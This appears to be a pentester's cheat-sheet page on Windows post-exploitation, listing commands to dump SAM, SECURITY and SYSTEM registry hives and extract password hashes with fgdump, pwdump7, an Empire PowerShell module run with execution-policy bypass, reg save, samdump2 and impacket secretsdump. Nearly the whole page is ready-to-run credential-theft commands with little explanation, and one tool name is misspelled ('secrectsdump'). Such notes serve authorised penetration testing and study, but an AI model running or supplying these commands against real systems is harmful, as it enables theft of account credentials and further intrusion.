dump SAM SYSTEM

SAM hash Format

uid : rid : LM_Hash : NTLM_Hash

foofus.net/fgdump | tarasco.org/pwdump7

START /B [fgdump.exe | pwdump7.exe]

EmpireProject/Empire/dump.ps1

powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-PowerDump.ps1; Invoke-PowerDump}"

manually

# actual location
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SYSTEM
# other locations
C:\Windows\System32\config\RegBack
C:\Windows\Repair

reg save hklm\sam c:\Users\Public\ksam
reg save hklm\system c:\Users\Public\ksystem
reg save hklm\security c:\Users\Public\ksecurity

# on kali
samdump2 ksystem ksam
impacket-secrectsdump -sam ksam -security ksecurity -system ksystem LOCAL
Previouswindows-post-exploitationNextRDP tools

Last updated